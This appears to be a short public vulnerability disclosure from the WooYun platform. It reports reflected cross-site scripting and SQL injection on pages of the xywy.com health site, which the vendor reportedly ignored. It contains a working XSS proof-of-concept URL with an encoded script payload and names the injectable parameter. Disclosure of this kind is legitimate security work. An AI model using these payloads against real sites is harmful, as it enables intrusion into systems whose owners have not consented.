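2012-06-06: Details reported to the vendor; awaiting vendor response
2012-06-11: The vendor has chosen to ignore the vulnerability; details disclosed to the public
First, why rate this 18 points? Because the rating is based on the site. 剑心 (Jianxin), don't scold me for it. I hope people in China will take WooYun, security, and white hats seriously! See the description for details.
XSS (cross-site scripting):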
http://club.xywy.com/zjzx/?type=list&cq=%22%3E%3Cscript%3Ealert%280604795%29%3B%3C/script%3E
SQL injection:
http://c1.xywy.com/huodong/yspx/medal_team.php?id=326
Strengthen the security system!!! Build security awareness!
Severity: no impact; ignored by vendor
Ignored at: 2012-06-11 13:01
2012-06-11: Thanks for the reminder~